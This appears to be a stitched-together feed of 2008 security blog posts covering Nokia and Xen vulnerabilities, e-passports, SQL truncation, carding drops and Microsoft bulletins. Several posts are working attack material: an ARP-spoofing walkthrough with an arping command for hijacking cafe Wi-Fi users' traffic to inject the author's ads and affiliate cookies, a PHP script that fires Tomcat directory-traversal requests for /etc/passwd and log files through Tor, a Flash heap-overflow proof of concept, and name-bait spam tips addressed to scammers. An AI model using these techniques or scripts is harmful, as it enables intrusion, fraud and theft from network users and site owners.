I have never understood news articles using terms like ‘claims’ and ‘rumors’ when reporting about several vulnerabilities reported in Nokia Series 40 (S40) phones.

Adam Gowdiak from Poland is a well known researcher, man behind Windows RPC issue MS03-026 etc.

Sun has confirmed that older versions of Java 2 Platform Micro Edition (J2ME) are affected (this was on 15h Aug already) and Nokia confirmed these issues today (let’s say, at last).

It is not known if Sun Microsystems or Nokia Corp. paid €20 000 to Gowdiak, last week or possible later.

Some references:

J2ME security vulnerabilities 2008
MIDP’s and MIDlets put tens of millions Nokia S40 phones in danger

-

Let the experts make sure your website is safe. Vulnerability Assessment is the answer.

During BlackHat USA, there were sightings of a mysterious white ninja. Witness reports claim he spoke with an english accent at 300 words per minute, raved on about sandboxing code, and plotted to take over the Web with a worm to wake people up (but just for a day). Anyone know who this phantom figure is?

Bonus points for posting the best photo caption. I’m thinking “practice safe output encoding”.

Today, HD merged in an amalgamation of windbg tools and plugins with a funny name into the main metasploit tree. We've been working on this collection for awhile now, and currently it represents (I think) a good step towards turning windbg from simply a good debugger into a powerful platform for exploit development.

The work that's currently released includes:

tenketsu - the vista heap emulator/visualizer which allows you to track how input to a program effects the heap in real time.

jutsu - a set of tools for tracking buffers through memory, determining what is controlled at crash time, and discovery of valid relative return addresses based on it

mushishi - a framework (with examples) for the detection and defeat of anti-debugging methods.

Used in conjunction with metasploit, jutsu in particular can significantly speed up exploit development time as it understands and makes use of msfpattern buffers natively. The README file can be found in the tree at external/source/byakugan/README and details functionality, usage, build, and installation. For the slides from the preliminary release at toorcon seattle, go here.

Currently we're looking for more suggestions for functionality. Anything that you do commonly and think may be automatable is up for discussion.

As it usually happens, there is some confusion regarding the attacks presented in our Xen 0wning Trilogy. Some people think they are possible only from Dom0 (the Xen's privileged, administrative domain) while some other people have the impression that all the attacks are possible from any unprivileged domain (DomU in Xen’s terminology). The truth is in the middle though.

Most of the attacks we presented do indeed require that the attacker first obtained access to Dom0 and only from there can launch further attacks. For example the DMA attacks that allow to overwrite hypervisor memory do indeed assume Dom0 access. The same applies to the Q35 exploit - this one is similar to the above mentioned DMA attacks in that it also requires access to certain hardware (that is possible from Dom0), but has an advantage that can bypass the hypervisor VT-d protection in the recent Xen 3.3.

There are several reasons why those attacks are still very important though:
1) First note, that the requirement for the attacker to have access to Dom0 in order to install e.g. hypervisor rootkits, is similar to the requirement that in order to install a Windows or Linux rootkit, one first needs to obtain administrator's privileges. Yet we know that Windows or Linux rootkits is a serious security problem.

2) Concerning the Xen-based systems specifically: over the last year several bugs have been discovered and published, that allowed an attacker to gain control of the Domain0 from an unprivileged domain (i.e. escape from the virtual machine). Rafal has discovered one such bug in December 2007.

3) Recent versions of Xen make deliberate effort to protect the hypervisor even from the Dom0. On systems that have IOMMU support (e.g. Intel's VT-d), the hypervisor memory is protected from tampering using both the processor's ring3/ring0 separation mechanism as well as the IOMMU protection. We showed that those protections can be bypassed.

The attempt to isolate hypervisor and protect it even from attacks originating from Dom0 is not surprising. After all if we would like to treat the hypervisor as a root of trust, then we should make sure that its code base is minimal. If we now allow Dom0 to effectively be the hypervisor (i.e. if we don't care about Dom0-to-hypervisor escalations) then we should include all the Dom0 code to the hypervisor code base, when evaluating hypervisor security. This would result in our "extended hypervisor" having not ~300k lines of code (like current Xen does), but millions of lines of code!

Having said that all about how important it is to prevent all the possible Dom0-to-hypervisor attacks, I should stress that we also presented an attack that does not require Dom0 access and that can be spawned from an unprivileged DomU domain. As far as I'm aware, Rafal's FLASK bug & exploit (presented in the 2nd presentation) was the first public example of a successful exploitation of an overflow in a bare-metal hypervisor. The bug was a heap overflow and Rafal presented some clever tricks of how to control the Xen's heap allocations in order to make this bug exploitable.

Please note that all the rootkit-like stuff that we also presented, i.e. Rafal's Xen Loadable Modules framework and his hypervisor rootkits, as well as Alex's and mine XenBluePill, can all be used with all the above mentioned attacks. So, e.g. if we are on a machine that has VT-d support and run Xen 3.3 we can still use the Q35 attack and get the XLM framework running and then use it to install e.g. XenBluePill on top of running Xen, as showed during the 3rd presentation. Similarly, we could use the FLASK exploit and get XLM running again and again used it for installation of the other stuff.

Hope this clears some confusion about our presentations. As already promised, the codes and demos and full version of the 2nd talk slides (with the Q35 attack details) will be posted after Intel release the patch for their motherboards. Stay tuned.

This week’s Risky Business is brought to you by Microsoft and hosted, as always, by Vigabyte virtual hosting. On this week’s show we take a look at e-passport security. After 9-11, Chimp W Shrub decreed that foreigners wanting to enter the United States would soon need to carry new-fangled, biometric passports with embedded wireless RFIDs.

The result was a rush job the likes of which you’ve never seen.

This week’s guest, Peter Gutmann, has figured out how to modify the data on e-passport chips. He hasn’t broken the encryption scheme responsible for signing the data but that doesn’t matter — no one checks to see if the signing key is genuine and even if they do the implementation is so bad it’s easy to fool.

The recent theft in Britain of 3,000 blank e-passports in a van hijacking is starting to make a lot more sense.

ZDNet Australia’s Munir Kotadia is back this week to chat about recent news, and this week’s sponsor interview is with Microsoft’s Jeffery Jones who talks comparative vulnerability analysis.

The music used at the end of this week’s podcast comes from Marshall and the Fro. Australians can buy the band’s album for $25 via Paypal (postage paid) here. Music used with permission.

This week's Risky Business is brought to you by Microsoft and hosted, as always, by Vigabyte virtual hosting. On this week's show we take a look at e-passport security. After 9-11, Chimp W Shrub decreed that foreigners wanting to enter the United States would soon need to carry new-fangled, biometric passports with embedded wireless RFIDs. The result was a rush job the likes of which you've never seen. This week's guest, Peter Gutmann, has figured out how to modify the data on e-passport chips. He hasn't broken the encryption scheme responsible for signing the data but that doesn't matter -- no one checks to see if the signing key is genuine and even if they do the implementation is so bad it's easy to fool. The recent theft in Britain of 3,000 blank e-passports in a van hijacking is starting to make a lot more sense. ZDNet Australia's Munir Kotadia is back this week to chat about recent news, and this week's sponsor interview is with Microsoft's Jeffery Jones who talks comparative vulnerability analysis. The music used at the end of this week's podcast comes from Marshall and the Fro. Australians can buy the band's album for $25 via Paypal (postage paid) here. Music used with permission.

Stefan Esser has a really good article about how MySQL and SQL truncate columns which can lead to security holes. He uses a good example of a column that has a width of 16 chars but he submits something with 17 chars. Obviously enforcing length is one way to enforce that, even if it almost never happens. But one other thing came to mind.

Harkening back to my days of reading Rain Forrest Puppy’s papers, I realized that often times the code does a straight regex or string matching. Eg: if ($username eq “admin”) { fail(); } but if the $username was “admin    ” it clearly will fail the string match since it’s not an exact match, but it will have the same net effect in the database of passing the check and allowing you to access the admin data. Likewise padding in front of the username will have the same effect in some cases - depending on how the SQL query is constructed (if it’s encapsulated). Anyway, good article, go read it!

Underground forums are always full of chatter around various activities related to online crime.

You keep reading about things like dumps (stolen credit card information), carding (using those cards), WU (Western Union), WMZ (Webmoney), CVVs (card verification value) and drops.

So what's a drop?

A drop is a remailing location. Many online shops refuse to send expensive items (think laptops, video cameras and so on) to faraway countries. So criminals use stolen credit cards to purchase items and have them mailed to a local drop, where someone else picks up the gear and forwards it to the final destination. Alternatively the dropkeeper will simply sell the goods in online auctions and then credits the carder with part of the profits.

Here's an example from an underground forum where an individual is advertising his website, providing such services. He offers 25% of the profits of the carder items to the carder — keeping 75% to himself.



And here's his website. Nice one.

On 18/08/08 At 11:41 AM

As I was turning to signal my waitress for the bill, I noticed that aside the couple at the corner, everybody else was hooked to their laptops. Time has changed and now people sit in cafes for wireless internet, a play list on shuffle and some good cappuccino. Even though we are all mixing business with pleasure, we are just like the next guy: we eat, we Google, we Facebook.

But I’m not here to talk about aroma, I’m here to explain how you can get money for somebody else’s work.

Tap the airwaves and play a role of a man-in-the-middle. When you’re right in the center of things, imagine doing these:

• Grep and replace adsense code blocks with your own pub-id. You will get paid, and not the owner of the website.
• Shove 1×1 px iframes to Amazon with your affiliation tag. These will store a cookie on the victim’s browser with your tag. Even if she buys a book a week later, you will still get your hard-earned pay.
• Replace facebook ads with match.com affiliation blocks.
• Proxy DNS lookups, and if dns resolve fails, show ads instead.

So how is it done? Quite simple, wlan is merely ethernet network over airwaves. It deals with the same concepts, IPs, MACs and ARPs. Whenever a program wishes to connect to a remote box (outside your netmask,) it will route the requests via the gateway. This gateway is the wireless router you laptop is connected to. Computers inside the local area network communicate in ethernet protocol, so when my laptop sends an IP packet to the gateway, it wraps it up with an ethernet header. ARP is a protocol used to associate IP addresses with MAC addresses.

The brunette next to the magazine stand is using her laptop. Since we are both connected to the same gateway, we are on the same subnet. Using a nifty tool called arping, I can send an arp announce (also named “Gratuitous ARP“) to her computer, forcing it to associate the gateway IP address with my laptop mac address. So whenever she browses the internet, my computer will receive all the packets.

I have no idea what’s her IP address, and it doesn’t really matter. I can just broadcast an ARP announcement and update all arp caches in this subnet. Consider the following command line:
C:\>arping -i “\Device\NPF_{031C071A-8ED1-4AD9-8FD6-A930D4FA15F9}” -v -S 192.168.0.1 -s 00-1b-77-53-f7-2f -B

This will broadcast (-B) an arp announcement of the address (-S) 192.168.0.1 (gw) with the mac address (-s) of my laptop. Use Wireshark to find out the interface name (-i) of your wireless adapter. If you are targeting a single computer, replace -B with the ip address of the victim.

Note that broadcasting to the entire subnet will also damage your own arp cache table. To re-associate with the real mac address, clean entry with ‘arp -d’.

Unlike other approaches for man-in-the-middle attack, this one keeps you hidden. Unless you make it obvious, people won’t suspect. After all, it hijacks an existing router, does not require reconnecting and I am pretty sure nobody keeps record of their arp table.

Remember, just don’t be a jerk.

-

Is your site safe from SQL Injection? Website Security Audit is the way to protect your network!

On good authority I was told to take a good hard look at the newly proposed HTML 5.0 spec that’s floating around the WHATWG. Firstly my eyes went to the new video and audio tags which are meant to help users deal with the apparently confusing nature of the fact that we have img tags instead of just using embed for everything. Personally I think that’s just a horrible idea that’s going to break a lot of blacklists out there and potentially open more security holes depending if the scriptable video objects are allowed, but there you have it.

Anyway, so then my eyes glanced across the new iframe spec and lo and behold I saw a miracle. Someone over at the WHATWG was really paying attention. Firstly, there’s a new parameter called sandbox which is similar in many respects to IE’s proprietary security=”restricted” parameter but with more granular controls. That’s not necessarily a good thing if you don’t like being framed, but it does give websites more control over what happens to their site once they frame a site that turns out to be bad.

But more importantly there is another new parameter called seamless which will allow a page of the same origin domain to iframe a page without having all the usability issues (double scroll bars, _self targets and so on) of the original iframe model. That’s great news for websites that want to frame and control a page on their own domain (a la content restrictions) without all the crazy usability issues with iframes. There’s some other security concerns with allowing content to be accessible on your site - there needs to be some tag to disallow rendering unless it’s embedded within an iframe to prevent someone from calling the malicious child frame directly. However, this is a big step forward in the right direction.

“How did you two meet? Did you mark her, or was it the other way around?”

- Robert Redford to Brad Pit, Spy Game

Con man 101: The best way to gain someone’s confidence is to make them think they contacted you. Scammers just love having potential victims contacting them.

Now, it seems they figured an interesting way to draw potential victims to their web site, in a way that is much easier than sending billions of spam email messages.
The idea is simple: take the person’s name (real people’s names are available for harvesting in places like linkedin, facebook, and other social networks) and put it in a web page. Doesn’t really matter where, as long as google indexes it.

Wait a while, and have that person google himself. Many people (myself included) have a ‘google alert’ on their name which sends them updated list of links to new pages where their name is mentioned.

Everyone likes to see where they are mentioned, so they will click on the link. And voila! They arrive to the spammer’s page. In some cases I’ve seen, the name was already gone from the page (but was still in the google cache). But all this doesn’t matter: as soon as the person reached the page, the web spammer’s job is done – he got his message in front of you, and maybe you’ll even dig deeper into his web site trying to figure out what the connection is to you.

There are many advantages to this method. First, you are not restricted by the message: the web page can openly have the words Viagra, Credit card debt and mortgage assistance without the fear of triggering anti-spam software. Also, people will pay more attention to the page since they think it has to do with them.

I don’t get the spammers’ marketing statistics, but I’m sure that the infamous spam text “it came to our attention that you’re in dire need of financial help” which sounds very much like a sincere, personal message, is a huge success. But this message has to get through the spam filters and include a real email address and a correct first/last name. The spam web page doesn’t need to bypass spam filters, and already has the correct name. In addition, you gain interesting information about the visitor: browser version, IP location and of course, the name he was searching for (that would be in the ‘referrer’ that is sent automatically by the browser to the web site). Oh, and of course – it’s cheap. You only need to put together a nice looking web page, and wait for google to do the rest. No buying of email lists and no cost of sending spam (which is nowadays the cost of hiring a zombie botnet for a couple of days).

For those aspiring scammers who are reading this, you should understand that it’s not a foolproof method. Obviously, it requires people to do a vanity search to reach you in the first place (though it also works on people who google their dates, their parents or their teachers). It also requires time – days, weeks or months (which may be difficult if your web site is on a zombie computer that might disappear by the time google indexes and the user comes to the site). But due to the fact the costs are very small, and there are no effective countermeasures at the moment, I think we will see more and more such attacks in the near future.

-

Make your website safe from SQL Injection attacks. Signup for a daily penetration testing to protect your network!

Ladeeeeez and gentlemen!

Well, methinks Linus is going to be “security villain of the week” for a few days again.

http://www.networkworld.com/news/2008/081408-torvalds-security-circus.html?hpg1=bn
Problem is, he’s actually got a good point.  Unfortunately, his use of “security circus” is going to be read as the whole security community, when he is actually referring to the lunatic fringes at both ends of the “disclosure” spectrum.  There are those who still cling to the outdated and disproved dogma of “security by obscurity,” and there are the self-promoters (with egos the size of the MS Windows Vista source code) who are eager to trumpet any little flaw they find as a “security” vulnerability.  Those of us in the trenches have been trying to keep vendors and consultants from using these arguments on the uninformed for years.  Linus is saying the same thing.  He’s as frustrated as we are, and for the same reasons.  He just uses more sensational phrases.

-

Is your site safe from SQL Injection attacks? Use an SQL Injection Scanner on a daily basis to protect your network!

Hi,

 

During this month’s webcast we were able to address 15 questions in the time allotted. There were several questions regarding ActiveX for the Cumulative IE Update (MS08-045), the Access Snapshot Viewer (MS08-041), Outlook Express Messenger (MS08-050) and the ActiveX Kill bits Security Advisory. We also fielded several questions around various deployment tools used for updating and we addressed some questions about the IPSec Update (MS08-047).

 

Here is the link to the full Q&A so you can see all of the answers that were provided for these great questions:

http://blogs.technet.com/msrc/pages/monthly-security-bulletin-webcast-q-a-august-2008.aspx

 

Also, here is the link to the Q&A index page in case you want to view previous months:

http://blogs.technet.com/msrc/pages/microsoft-security-bulletin-webcast-q-a-index-page.aspx

 

As always, customers experiencing issues installing any of the updates this month should contact our Customer Service and Support group:

 

Customers in the U.S. and Canada can receive technical support from Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates.

 

International customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.

 

Thanks!

 

Al Brown

 

*This posting is provided "AS IS" with no warranties, and confers no rights.*

 

How easy is it to break into your Gmail account? How about Yahoo! Or Windows Live?
If you provided a truthful answer to the security question during signup, it is probably quite easy to hijack your account, with just a little bit of a research.

Take a look at the Yahoo! Security Questions:

Are these security questions?

Anyone that knows my address can easily figure out the name of my first school or my high school mascot. All of my neighbors, family and friends know both my dog’s name and my dad’s middle name, and everybody in the world knows I just LOVE the Lakers. As for my wife and me, the people who attended our wedding had the chance to hear about it in the ceremony - in case you couldn’t make it, we met on a roof of a bus, in Ladakh, India in 1994…

The fact that the answer to each of the security questions above is relatively easy to find out, makes them a security vulnerability in my Yahoo! account.
By letting me make a security key based on the name of my first school, Yahoo! actually puts me at risk, allowing anyone that knows where I live to hijack my account. It’s like saying “We have the greatest lock to protect your house. Now, why don’t we hide the key under the mat”.

Windows Live is pretty much the same as Yahoo!:

Gmail is a little bit more sophisticated with one major difference:

Gmail is the only one of these three that allows you to choose your own question.
By letting you do that, Gmail asks “which question only you can answer?” I think that most people might still come up with “Who is my favorite singer”, “What is my date of birth” or “My dog’s name”.
However, that isn’t a security vulnerability encouraged by Google. If they give you the tools and you fail to use them, it’s not their fault.

So, what can we do about it?
If you can write your own question, that would be the best. If not, choose the question about the name of your first school and put your first phone number as the answer. That’s what I did!

Got better ideas? Share them with us!

-

Expose the security holes in your products during development. Black Box Testing makes it safer!

Bank robbers using remote control device to control the mouse cursor of bank employee have been jailed now, report the headlines.

We can’t expect that an ordinary worker will know if USB sticks, peripherals with Bluetooth enabled, innocent looking hardware keyloggers etc. connected to their desktop computers and even to laptops are malicious - and not installed by a local IT support.

This Swedish worker recognized an odd device connected to his workstation, but a target organization is not so lucky every time. ”Employee quickly pulled the plug, interrupting a transfer” ($7.9 million), but there was an extra cable which ended up under his desk.

It’s worth of mentioning that this remote control device had been installed to bank workstation during a previous break-in, during which nothing had been stolen from the building.

Therefore, the ways how we can protect against these threats are not so typical:

* Check the USB and PS/2 connectors of your workstations and servers several times a year
* Always check these connectors when a computer returns from being repaired
* Remember that visitors have a possibility to connect these devices often

-

Make your website safer. Use an external vulnerability scanner. Nothing to install, zero maintenance!

For some days we've been spam runs with titles like "CNN Alerts: My Custom Alert" or "CNN Alerts: Breaking news". These are fake news articles that point to a fake news page that will try to download malware to your machine.

Apparently people stopped clicking on fake CNN links as today the attackers switched the mails to look like they are now coming from MSNBC.

Some examples:



Example email:

• From: MSNBC Breaking News
  Subject: msnbc.com - BREAKING NEWS: Elvis Presley daughter gives birth to twins
  Precedence: list
  
  msnbc.com: BREAKING NEWS: Elvis Presley daughter gives birth to twins
  Find out more at http://breakingnews.msnbc.com
  ======================================================
  See the top news of the day at MSNBC.com, and the latest from Today Show and NBC Nightly News.
  =========================================
  This e-mail is never sent unsolicited. You have received this MSNBC Breaking News Newsletter
  newsletter because you subscribed to it or, someone forwarded it to you.
  To remove yourself from the list (or to add yourself to the list if this
  message was forwarded to you) simply go to
  http://www.msnbc.msn.com/id/11611202, select unsubscribe, enter the
  email address receiving this message, and click the Go button.
  Microsoft Corporation - One Microsoft Way - Redmond, WA 98052
  MSN PRIVACY STATEMENT
  http://privacy.msn.com (http://privacy.msn.com/)
  

And the links point to a web page looking like this (notice the sudden change from MSNBC to CNN):



The site tries to prompt you to download ADOBE_FLASH.EXE, which we detect as Trojan-Downloader.Win32.Exchanger.mn.

On 13/08/08 At 03:03 PM

You might have seen the new Apache Tomcat <= 6.0.18 vulnerability found by Simon Ryeo[1]. The vulnerability involved a problem in Tomcat with processing UTF-8 encoded URI's which resulted in a directory traversal and canonicalization issues while mapping the paths. If context.xml or server.xml allows 'allowLinking' and 'URIencoding' as 'UTF-8', directory traversal becomes possible. Curious enough this is pretty much de facto on *NIX systems. Ah the joy of standards! I don't know what is happening at Apache, but Tomcat is quite often vulnerable. It isn't the first time you see.

So let's exploit *cough* test it:

<?php



$url = "http://www.google.com";



$dir = array(

"%c0%ae%c0%ae/etc/passwd",

"%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/httpd/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/httpd/error_log",

"%c0%ae%c0%ae/apache/logs/error.log",

"%c0%ae%c0%ae/apache/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/access.log",

"%c0%ae%c0%ae/logs/error.log",

"%c0%ae%c0%ae/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/logs/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/logs/error_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/logs/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/usr/local/apache/logs/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/usr/local/apache/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/logs/error_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/usr/local/apache/logs/error_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/usr/local/apache/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache/error_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/error_log"

);



function wrap($url){



$ua = array('Mozilla','Opera','Microsoft Internet Explorer','ia_archiver');

$op = array('Windows','Windows XP','Linux','Windows NT','Windows 2000','OSX');

$agent  = $ua[rand(0,3)].'/'.rand(1,8).'.'.rand(0,9).' ('.$op[rand(0,5)].' '.rand(1,7).'.'.rand(0,9).'; en-US;)';



        # proxy

        $tor = '127.0.0.1:8118';

        $timeout = '300';

        $ack = curl_init(); 

        curl_setopt ($ack, CURLOPT_PROXY, $tor); 

        curl_setopt ($ack, CURLOPT_URL, $url);

        curl_setopt ($ack, CURLOPT_HEADER, 1);  

        curl_setopt ($ack, CURLOPT_USERAGENT, $agent); 

        curl_setopt ($ack, CURLOPT_RETURNTRANSFER, 1); 

        curl_setopt ($ack, CURLOPT_FOLLOWLOCATION, 1);

        curl_setopt ($ack, CURLOPT_TIMEOUT, $timeout);



        $syn = curl_exec($ack);

        $info = curl_getinfo($ack);

        curl_close($ack);

        

    if($info['http_code'] == '200') {

        return $syn;

        die();

      } else {

    return "Fail! :".$info['http_code']."\r\n";

  }

}





    for($i=0;$i<count($dir);$i++) {

       echo wrap($url.":8080/".$dir[$i]);

    }



?>

[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938

A short update of developments this week. Let's start with how to impress girls.

I just read some slides from Blackhat, and one that caught my interest was the slides from Mark Dowd and Alexander Sotirov[1]. I guess I don't have to explain who those gentlemen are. Right, now what caught my eye was a mention about the use of verbatim dll pointers in an object. Usually, with ActiveX we load the classid followed by the id that links to the dll. In this case, they just load the dll into the object and that raises no warning in the Internet Zone. Clearly this is some very notable find and certainly material to impress girls with, because I never assumed that that was possible. It shows again that a solution is always in it's environment. It's simple, but brilliant.

Loading verbatim dll's:

<object classid="ControleName.dll#NameSpace.ClassName"></object>

That is only one tiny part of the paper, go read it if you are interested. It is a real eyeopener. It covers:

- "Stack Spraying", an alternative method to heap spraying with some additional benefits
- Exploiting poor permissions, such as Java's RWX memory allocator, and
- Utilizing .NET binaries to map data at an attacker-controlled memory location.

Adobe fixes heap corruption.

Some time ago, I found that the Flash9c.ocx was vulnerable to heap corruption, and that it's possible to overflow the SWRemote property inside the Flash9c.ocx Interface with a very long string generated in VBscript. In my test case it ran for about 30 seconds before crashing and raising an exception, when trying to kill it, it could result in a full system freeze. After updating Flash It seems Adobe fixed this silently in at least Flash9f.ocx. A real bummer for personal research. I cannot reproduce it anymore, because I did not make a copy of Flash9c.ocx for future research. Anyway I learned to make copies now.

Interface IShockwaveFlash : IDispatch

Default Interface: True

Members : 93

	Quality

	ScaleMode

	AlignMode

	BackgroundColor

	Movie

	FrameNum

	SetZoomRect

	Zoom

	Pan

	GotoFrame

	FrameLoaded

	WMode

	SAlign

	Base

	Scale

	BGColor

	Quality2

	LoadMovie

	TGotoFrame

	TGotoLabel

	TCurrentFrame

	TCurrentLabel

	TPlay

	TStopPlay

	SetVariable

	GetVariable

	TSetProperty

	TGetProperty

	TCallFrame

	TCallLabel

	TSetPropertyNum

	TGetPropertyNum

	TGetPropertyAsNumber

	SWRemote

	FlashVars

	AllowScriptAccess

	MovieData

	ProfileAddress

	ProfilePort

	CallFunction

	SetReturnValue

	AllowNetworking

	AllowFullScreen

SWRemote

The property SWRemote inside Flash9x.ocx interface obtains a string passed through the object:

Property Let SWRemote  As String

The proof of concept was:

<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='foo'>

   <param name="src" value="foo.swf">

</object>



<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='bar'>

   <param name="src" value="foo.swf">

</object>



<script type='text/vbscript'>



long=String(100000000,"X")



foo.SWRemote=long

bar.SWRemote=long



</script>

Live trace:



Now the interesting thing about this is, I fuzzed all classes in that particular dll without regard if they were considered fuzzable or not. It turns out that, in blackbox fuzzing you can find vulnerabilities that you would not find while fuzzing on assumptions, like COMraider does for example. Secondly, I used two flash objects, or two dll class calls. That made a difference in finding this vulnerability. HD Moore once said that you'll have to know what to fuzz for. This is true in some sense, because it speeds up your fuzzing. But the drawback is, that you cannot encompass all possibilities and quirks. The very vulnerabilities you look for might be not fuzzable without hammering all classes whether they are fuzzable or not, because it turned out that it certainly was in this case.

[1] http://taossa.com/archive/bh08sotirovdowdslides.pdf

Software security sage Gary McGraw (CTO, Cigital) published his market research on what he believes are the 2007 revenue numbers for application security vendors. Speaking for myself, I can neither confirm nor deny the accuracy of this data, certainly when it comes to WhiteHat.

Fortify: $29.2 million
Coverity: $27.2 million
Klockwork: $26 million
Watchfire (IBM): $24.1 million
SPI Dynamics (HP): $22.3 million
Cenzic + Codenomicon + WhiteHat: $12.5 million
Ounce Labs: $9.5 million

$150.8 million total for the tools / SaaS market

“The source code analysis space is now larger than the black box testing tools space….”

Sort of, but more on that in a moment.

“Tools don't run themselves”

Ain’t that the truth.

“The hard-to-track software security services space checks in around $100-140 million in 2007, with growth just shy of 20% over 2006. Services can be divided into three tracks: training (around $7 million), risk assessment ($45-60 million) and penetration testing ($50-75 million).”

I’m not sure about the risk assessment number, but I’m thinking the estimates for training and penetration testing is probably orders of magnitude lower than they should be. The rates for larger players including IBM Global Services, Verizon, Symantec, Ernst & Young, PwC, and KPMG aren’t cheap. And to some extent neither are the smaller players such as Matasano, SecTheory, iSec, Leviathan, Denim Group, Foundstone, Gotham, NGSS, FishNet, Aspect, SANS, IOActive, Immunity, NTO, NGS, BlueInfy, Net-Square and dozens of other regional players. No wonder the overall market totals are tough to track, but each takes their piece of the pie.

